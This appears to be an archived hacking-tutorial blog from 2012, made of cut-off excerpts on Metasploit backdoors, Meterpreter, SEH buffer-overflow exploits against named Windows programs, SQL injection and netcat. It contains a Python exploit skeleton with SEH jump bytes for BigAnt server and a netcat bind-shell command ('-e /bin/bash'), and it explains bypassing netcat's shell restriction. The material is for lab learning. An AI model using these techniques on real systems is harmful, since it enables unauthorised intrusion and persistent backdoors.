Wednesday, February 29, 2012

Interact With Metsvc Backdoor

To interact with the meterpreter backdoor service we've created before, we can use a multi_handler with a windows/metsvc_bind_tcp payload to connect with the backdoor. 
To remind you again, this backdoor require no authentication to connect. So it is a dangerous backdoor to use since anyone can use it too.

Ok, here's a way to connect to the metsvc backdoor we've created before.

- Load up your msfconsole

Meterpreter Backdoor

Again, meterpreter is the most convenient payload to use. Part of the hacking framework is creating a backdoor for later use so we don't need to go through normal attack to access the system again. Meterpreter can make a backdoor on a system that we've successfully exploit. Make us can get a meterpreter shell anytime we want. Cool right..  :D
There's a module called "metsvc" that will create a persistent backdoor on a system. This module is created by Alexander Sotirov. Read more here http://www.phreedom.org/software/metsvc/. One thing to keep in mind, metsvc requires no authentication. This means anyone can access our backdoor if they know the port that we use. This is not a good thing if you are performing a real pentest.

Meterpreter ~ Basic Usage

Here's some basic meterpreter commands you can practice..  :)

- help
Display all commands that can be executed by meterpreter.

- background
Return to the msf shell and send the current meterpreter session into background. To interact with it again, just type 'sessions -i [id]'

Meterpreter

Meterpreter (meta-interpreter), is an advanced payload included in the Metasploit Framework. In my opinion this is the best payload ever. It can upload/download victim's files, read stored password hashes, keylogging, and even run a vnc server on the victim's machine. 

Meterpreter compatible with most of the exploit and auxiliary on metasploit. Making it the most sophisticated and the most used payload by pentesters and hackers. The way that it accomplishes this is by allowing exploit developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. 

Monday, February 27, 2012

Exploit Combo ~ BeeF & Metasploit

Exploitation is so much fun and exciting for me..  :D
In this post I'll try to combine BeeF and Metasploit to create an Attack. BeeF, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my XP SP3 Machine.

Lets get started..  >:)

- First, start your BeeF-ng services..

MSFpayload & MSFencode

Again, in this post I'll explain some of the metasploit features..  :)

- MsfPayload
msfpayload is the metasploit tool to generate a payload for the exploit. Its function is the same as msfweb that I use in my other posts, but this tool is in console, so its rather difficult for newbies to use. But with regular training, this tool is better than msfweb because it greatly save time and RAM space. 
# msfpayload -h

Social Engineering ~ Definition and Tool

In this post I'll explain about the definition of social engineering and the tools to do it. Although its only a little and not in detail, but I think its enough to help you understand better about Social Engineering.

Lets talk about vulnerability first.
Vulnerability, is a weak point that exist on a system. This vulnerability is not only on the hardware and software, but also on the environment, the network and also the administrator/user. Social Engineering is the technique to attack the human vulnerability, usually the biggest vulnerability that exist on the human is the Low Security Awareness. 

Working With Metasploit Auxiliary

Metasploit is a powerfull framework to do an exploitation. There are a lot of thing we can do with it. Exploits, Payloads, Encoders, and Auxiliaries are ready to be used to do an exploitation. In this post I'll explain a little about metasploit auxiliary and how to use it. 

Auxiliary is a set of tools developed to perform reconnaissance like scanning, sniffing, fingerprinting and the other security tasks. With this auxiliary, we can use metasploit to do the earlier hacking framework without other tools, just metasploit and its auxiliary and the other modules, this will make our security tasks far more easier.

So, here's an example the use of an auxiliary..

Friday, February 24, 2012

Linux Exploitation : Stack Overflow

After a week full of Windows exploitation. This time I'll try to explain about Linux Based Stack Overflow Exploitation. There are no big difference between exploitation in windows and in linux. We still have to deal with memory registers, addresses, and payload.

Ok, lets begin..

- First, we must turn off the ASLR on Linux. ASLR stands for Address Space Layout Randomization, it is a computer security method that can make the positions of key data areas to be randomly positioned. Usually including the base of the executable and position libraries, heap, and stack in a process's address space. To turn it off, execute this command.

SEH Based Buffer Overflow : Elecard MPEG Player

In this post I'll try to exploit a software called Elecard MPEG Player that have a SEH Protection (Again??)  :D
Exploit a software is fun if we know the technique and can be very frustrating if we can't exploit it even after hours of struggle.

Okay, Lets get started.

- Install the software on the machine.

- Lets open a file to see what file extention is supported by this software.

Wednesday, February 22, 2012

SEH Based Buffer Overflow : File Sharing Wizard

In this post, I'll try to exploit a software called "File Sharing Wizard" version 1.5.0 build 26-8-2008. This software have a SEH protection. So, I'll use the technique like when I exploit BigAnt server. 

Lets get started..  

- First thing to do is install the software on your xp machine.

- This is a file server, so we will use a remote exploit for our fuzzer.
- Searching what port this software is running.

Sunday, February 19, 2012

Search for "Bad Characters"

In my post about exploiting BigAnt server, when generating payload I'm entering 0x20 and 0x25 as bad character. How to search for a bad character in the application that will be exploited? Here's the way to do it. The application that will be used is still BigAnt server, but I think the method to find the bad character is the same in all aplication. This knowledge is essential because without entering the right bad character, our payload won't work properly as we wish.

Lets begin..  :D

- Use this fuzzer as the starting point.
Fuzzer:
#!/usr/bin/python
import socket
address="192.168.56.2"
port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address,port))
sock.send(buffer)
sock.close()
print ("Done")

Saturday, February 18, 2012

More About SEH and SafeSEH

As explained before, SEH (Structured Exception Handling) is the protection integrated on a system of a software to handle the abnormal flow of the program that can caused the program to act abnormal too (crash, hang, etc). SEH will prevent the EIP to be overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software. This protection definitely forcing hackers to develop a technique to bypass the SEH protection. When this protection can be controlled, the execution process on the CPU also can be controlled easily like in the Direct Return Exploitation.

Friday, February 17, 2012

SEH Based Buffer Overflow - BigAnt Server

This time, I'll try to explain how to exploit a software that have a SEH protection on its system called BigAnt Server. SEH is an exception handler to protect the EIP to be overflowed by the abnormal flow on the software. This will force us to use different attack vector and technique because if we use the same technique as in the Direct Return Exploit the attack won't work because of SEH.

BigAnt server is an Internet Messenger server. The version of the software that used in this post is 2.52 Service Pack 5.

Lets get started..  >:D

Monday, February 13, 2012

Buffer Overflow - VUPlayer

Again, in this post I will try to exploit a software using the Buffer Overflow technique. The software is called VUPlayer.

Lets do some testing first to make the software crashed. That will be my attack vector. 

Alhamdulillah, this morning I'm succeeded to make the software crashed in the first try. Here's what I did.

- Of course installing VUPlayer in my Windows XP machine.

- Okay, I want to try adding url. (of course the url is not the valid one..  :P  )
- Making 1000 'A' character in notepad.

Saturday, February 11, 2012

Reverse Engineering Mini-Stream RM-MP3 Converter

Reverse engineering is an interesting advanced hacking technique to be learned. Once we knew the technique I'm sure that when there is a bug in a program, although the bug is only a little, we can exploit that vulnerable point to hack our target machine. 

So, at the other post we've already do a reverse engineering technique against WarFTP. In this post we will try to do it with a software called Mini-Stream RM-MP3 Converter.

Lets get started.

- First, Install the software on your XP machine.

- I'll search for some information in www.exploit-db.com/search.

Sunday, February 5, 2012

Reverse Engineering WarFTP

Finally, after preparing OllyDbg and WarFTP on our machine, its time to put reverse engineering in action.

What I do in this post is based on my sensei's book titled "Harmless Hacking". Lets get started. 

- Start your Windows XP machine.
- Open WarFTP and start its service by clicking Properties > Start Service

Saturday, February 4, 2012

Installing WarFTP for Reverse Engineering

The target for my first reverse engineering is a software called WarFTP given by my sensei. In the other post we've setup the debugger program, now lets install the software on the machine. (If you want to use WarFTP like this post you can download here)

1. Again, I'll transfer the WarFTP master to my machine using web server.

2. Download the master

Setup OllyDbg

Ok, my sensei give me a task to do a Reverse Engineering on a software called WarFTP. Before do that I must install OllyDbg first to debug the software. I'm using Windows XP SP3 in VirtualBox. So, lets get started.

1. Start up your XP machine.

2. I'll transfer the OllyDbg master to my machine using web server. So I put the master into /var/www/files on my backtrack. (If you haven't downloaded the master, you can go here)

Introduction to OllyDbg


In this post, we've learned about reverse engineering. What we will talk now is one of the tool used for that called OllyDbg.

Before discussing OllyDbg, we must know what is debugging. Debugging is a structured process to find and reduce the number of bugs or defects in a computer program and repair it. When there are a bug in a system, especially when there are lots of subsystem in it will make the debugging process become harder because a changes in one may cause bugs appear in the other.

Reverse Engineering at Glance

Lets talk about Reverse Engineering briefly, because this is also important thing to know when you want to become an expert hacker. 

Reverse Engineering is an activity to discover the material how a something is made, how something is works and what is its purpose. In the other word, discovering the technological principles of something by analizing its structure, function and operation. Usually the thing that want to be reverse engineered is taken apart from its original form then analyze each part one by one throughly.

Introduction to SQL Injection & Blind SQL Injection

MySQL is one of the most famous database server used by many people in the world.  However, many administrator don't set the MySQL correctly and that will make the database can be Injected by a hacker.

SQL Injection is a hacking technique that utilize the low security settings or poorly designed database on a server. SQL Injection usually done by inserting a series of code to the url or  a form of a website. The vulnerability appear when the user input is not filtered correctly, so when the user insert a SQL character into a form, that code will be executed by the database server. To know where is a site is injectable or not, simply put ' character after the url of the site. If an error appear like "You have an error in your SQL syntax, bla bla bla..." then the site is 99% injectable.

Buffer Overflow : Direct Return & SEH Based

At my other post we've known a little thing about buffer overflow. Now we will talk two cases that happened when we do a Buffer Overflow that is Direct Return Exploit and SEH Based Exploit and whats the difference between those two.

- Direct Return Exploit
Direct return exploit happened to a program that can't handle an exception. A condition where an application trying to execute a code outside its normal work cycle. As the results, when an application that can't handle an exeption buffer overflowed, the EIP registered in the buffer memory will directly overwritten by the rest of the data that we use to overflow the application.

Friday, February 3, 2012

Buffer Overflow at Glance

Buffer overflow is one of hacking technique to gain root/adminstrator privileges access by exploiting the weak application vulnerabilities installed/running in a system. How can this be done? The hacker make an application/program that will make the buffer memories provided by the system for the target application will overload and then overwrite the other buffer.

Introduction to Buffer Overflow : CPU Register

 If we want to master the Buffer Overflow technique, first we must have a knowledge in CPU Register. Register is the part of the processor's memory that can be accessed with a high speed and always used by microprocessor as the medium to do its work.
An x86 based CPU used 8 register : EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP. Each of them designed for a specific job that make the CPU process the information eficiently.

1. EAX Register
Used to perform calculations and store the value returned from the function call. Basic operations such ass add, subtract, and compare is optimized in EAX Register. Special operations such as multiplication and divide are done by EAX Register.

Wednesday, February 1, 2012

Metasploit at Glance

There're a lot of explanation of metasploit out there. Buy I'll try to explain it with my point of view.

Metasploit is the name of a project and a framework. 
a. Metasploit Project
Metasploit   project   is   an   open-source,   computer   security   project   that provides information about security vulnerabilities and aids in penetration testing. Some of its sub-projects are the famous metasploit framework, opcode database, shellcode archive, and security research. Simply, metasploit project is the procjet or activity around computer security section and the one that created metasploit framework.

b. Metasploit Framework

Vulnerability at Glance

Lets talk about Vulnerability..

Wikipedia : 
"In computer  security,  a vulnerability  is a weakness which allows an attacker to  reduce a system's information assurance. Vulnerability is the intersection of three elements : a system  susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw. To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness.   In this frame,  vulnerability  is also known as the attack surface."

ISO 27005 :

Information Gathering Task



Bypassing Login Screen

Ok, Lets try to bypass the login screen on my testing webpage located in /var/www/fbip.

1. Open the browser and type in the address bar
localhost/fbip
A simple, ugly web page will appear.

DVWA : SQL Injection

DVWA(Damn Vulnurable Web Application) is a web that have a lot of security issues inside. 
Lets try to Inject it with sqlmap.

1. Start your mysql and apache2 service.
# service apache2 start
# service mysql start

2. Open your browser and type the url of your dvwa.

Introduction to TOR and Proxychains

Lets talk about TOR and Proxychains. These two things are a great tools to make us stay "Anonymous" while hacking.  

TOR first..
Tor is a virtual network tunnels that allows Internet user to greatly imrove their privcy and security while surfing on the Internet. Actually, tor was designed, implemented, and deployed as a third-generation onion routing project of the U.S Naval Research Laboratory. But the information about it is leaked and now everyone can use it on a wide variety of purposes. Originally developed with the U.S. Navy in mind for the purpose of protecting government communications.

Why do we need TOR?

Introduction to Google Hacking

Google hacking is a hacking technique that utilizes google search and another google services to find security holes or vulnerabilities on a site's configuration and any information on it.

Google hacking can be done by using advanced operators in the Google search bar to locate specific strings of text within search results. Simply, any advanced operators provided by google can be used to help us to find a vulnurable sites. 

Here's an explanation of google hacking from wikipedia : 
"Google hacking is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use.

Introduction to Shodan

You know search engine like Google, Yahoo or Bing right?

Shodan is like that. It is also a search engine. The difference between shodan and usual search-engine is the thing that searched. While google,yahoo or bing is good to search for websites, shodan is also a great search engine to find a specific computer (routers, servers, etc.) using various filters to put your searching into more specific.

Shodan lets you find servers or routers easily by using the search bar on its homepage. It can find what web are running what (example, web with ip 114.166.242.76 is running apache version 2.3.3)
Great search engine isn't it?

Using "mkfifo" to Bypass Netcat's OpenBSD Limitation

There are two version of Netcat, traditional and openbsd. 
The traditional version is the one that I've been used in my previous post. It have more function than the openbsd version.
In the openbsd version we can't add -e command. This because the openbsd version is designed to prevent the hacker who want to make a backdoor use it. This way, we can't create a shell.

But, there's a way to bypass it using mkfifo. Mkfifo help us to create a pipe connection. Pipes allow separate process to communicate without having been designed explicitly to work together. This allows tools to combine their function in complex ways.
Mkfifo takes one or more file names as arguments or commands for the specified task and creates pipes with those names.
Ok. Lets start..

1. Remove the netcat-traditional and install netcat-openbsd to your ubuntu machine.
# apt-get remove netcat-traditional
# apt-get install netcat-openbsd

Injecting Cymothoa to Ubuntu using Netcat

So, in my other post we've been learned how to inject cymothoa to ubuntu using the web server to transfer the cymothoa. In this post I'll try to explain how to transfer and injecting cymothoa using Netcat.

Okay, lets get started.

1. Start up your ubuntu.

2. Start the nc server on the ubuntu
# nc -l -p 4321 -e /bin/bash